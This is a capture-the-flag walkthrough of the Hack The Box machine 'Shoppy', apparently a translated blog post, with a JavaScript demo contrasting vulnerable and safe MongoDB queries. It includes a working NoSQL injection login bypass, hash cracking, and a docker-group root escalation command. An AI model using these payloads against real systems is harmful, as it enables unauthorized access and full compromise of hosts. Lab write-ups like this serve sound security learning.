Hack The Box. Walkthrough: Shoppy. NoSQL injection and privilege escalation via Docker
![](https://habrastorage.org/getpro/habr/upload_files/159/966/b9f/159966b9fdab6262881a01fd1efb7144.png)
A scan with nmap -sV -sC showed:
port 22: OpenSSH
port 80: nginx 1.23.1, redirecting to http://shoppy.htb
![](https://habrastorage.org/getpro/habr/upload_files/740/6d6/d3a/7406d6d3acdb2d8230bbe655d3f73dff.png)
Add the machine's IP address and the name shoppy.htb to /etc/hosts so that the redirect resolves.
Vhost via gobuster:
While nmap is still running, we use gobuster to look for virtual hosts (subdomains) and widen the attack surface.
gobuster vhost -w /home/hell59/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb
![](https://habrastorage.org/getpro/habr/upload_files/b38/18b/5f8/b3818b5f8e8fcac00c46e2674b183195.png)
Manually explore the web application:
We examine the application's source manually.
![](https://habrastorage.org/getpro/habr/upload_files/141/2f3/9d5/1412f39d5a10e7f88a4244a52aa2cf88.png)
We find nothing except a countdown timer.
Search for files and directories:
Let's look for directories and files; maybe we'll find something interesting.
wfuzz -c -z file,/home/hell59/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "http://shoppy.htb/FUZZ/"
We see an /admin path, which redirects us to /login:
![](https://habrastorage.org/getpro/habr/upload_files/484/743/274/4847432740ce3cb1304472882a9041ce.png)
MongoDB NoSQL:
Looking at how the login form behaves, we conclude that the backend is a MongoDB (NoSQL) database.
![](https://habrastorage.org/getpro/habr/upload_files/481/ef6/4a9/481ef64a932fc36bff015a2f700ce9ce.png)
We can log in with the following NoSQL injection:
login: admin'||'1==1
password: admin
It works!
You can read about NoSQL injection here: https://book.hacktricks.xyz/pentesting-web/nosql-injection .
![](https://habrastorage.org/getpro/habr/upload_files/fe4/846/b2e/fe4846b2e95a41ae62fe8e40ad664a3a.png)
Entering admin'||'1==1 again in the admin panel returns the list of users along with a password hash.
![](https://habrastorage.org/getpro/habr/upload_files/e9e/901/306/e9e90130675a868bbb08cd298f7df59d.png)
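Why does admin'||'1==1 bypass the login and, a step later, dump every user? The payload only makes sense if the application splices the username straight into a JavaScript expression that MongoDB evaluates per document (a `$where`-style query). The following is an added example, not Shoppy's source code: it simulates that server-side evaluation with a toy in-memory collection (the user records are constructed), shows the concatenated query next to a filter-object query, and confirms that only the concatenated form is injectable.

```javascript
// Added example: a toy model of MongoDB's `$where` evaluation.
// The collection contents and the query shape are assumptions; the real
// Shoppy application code is not shown on this page.
const users = [
  { username: 'admin', password: 'hunter2' }, // constructed sample data
  { username: 'josh',  password: 'secret'  }, // constructed sample data
];

// Stand-in for `$where`: the expression is evaluated once per document with
// `this` bound to that document, which is how the server treats `$where`.
function findWhere(collection, jsExpr) {
  const predicate = new Function(`return (${jsExpr});`);
  return collection.filter(doc => predicate.call(doc));
}

// VULNERABLE: user input becomes part of the JavaScript expression.
function buildWhereExpr(username) {
  return `this.username == '${username}'`;
}
function loginVulnerable(username) {
  return findWhere(users, buildWhereExpr(username));
}

// SAFE: a plain equality filter. The value is compared as data, so it can
// never be interpreted as code, whatever quotes or operators it contains.
function findByFilter(collection, filter) {
  return collection.filter(doc =>
    Object.keys(filter).every(key => doc[key] === filter[key]));
}
function loginSafe(username) {
  return findByFilter(users, { username });
}

const payload = "admin'||'1==1";

// The expression becomes: this.username == 'admin'||'1==1'
// `'1==1'` is a non-empty string, hence truthy, so every document matches.
console.log(buildWhereExpr(payload));
console.log(loginVulnerable(payload).map(u => u.username)); // [ 'admin', 'josh' ]
console.log(loginSafe(payload).map(u => u.username));       // []
console.log(loginSafe('admin').map(u => u.username));       // [ 'admin' ]
```

Note that the same predicate that lets you log in as the first matching user also turns a "find user by name" feature into a full table dump, which is exactly the second use of the payload above. Switching to filter objects closes this particular hole; if the application then accepts JSON bodies, the query operators themselves (`$ne`, `$regex` and friends) need to be rejected from user input as well, which the HackTricks page linked above covers.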
Crack the resulting MD5 hash with hashcat:
We run hashcat in MD5 mode (-m 0) against the rockyou.txt dictionary and look at the result:
![](https://habrastorage.org/getpro/habr/upload_files/6f4/ef7/584/6f4ef7584c10a580c8675816d978f6aa.png)
Log in to the subdomain:
Now, after adding it to /etc/hosts, go to the mattermost subdomain,
http://www.mattermost.shoppy.htb , and log in with the cracked password.
![](https://habrastorage.org/getpro/habr/upload_files/577/b73/89b/577b7389b76bb078d0b55b13d1925cd5.png)
Here we find the user's chat history, which contains important information about the deployment of the machine:
![](https://habrastorage.org/getpro/habr/upload_files/6f8/4b5/e83/6f84b5e832fb488153a4974272cf6a67.png)
Get the user flag:
With the credentials obtained from the chat, we log in via SSH, find user.txt and cat it.
![](https://habrastorage.org/getpro/habr/upload_files/031/4fa/b19/0314fab199847e7bf19190d97601e45e.png)
sudo -l
![](https://habrastorage.org/getpro/habr/upload_files/854/cdd/602/854cdd602392a5deb46fbe926b6e0919.png)
If you dig through the files of the password-manager, you can fish out its master password, Sample, and enter it.
This gives us a username and password:
![](https://habrastorage.org/getpro/habr/upload_files/f0b/3cf/dbe/f0b3cfdbe02145489105b0f90823c9da.png)
Log in via SSH as the deploy user.
Get the root flag:
Since deploy can run docker, we use the Docker privilege-escalation technique described here: https://gtfobins.github.io/gtfobins/docker/ . This is not a bug in Docker itself: the daemon runs as root, so any user allowed to start containers can mount the host's root filesystem into one and chroot into it.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
![](https://habrastorage.org/getpro/habr/upload_files/064/988/02f/06498802ffca5a3544e3b95b130dc977.png)
Hooray, we got root!
I don't see the authorization header; how did you determine it was MongoDB NoSQL?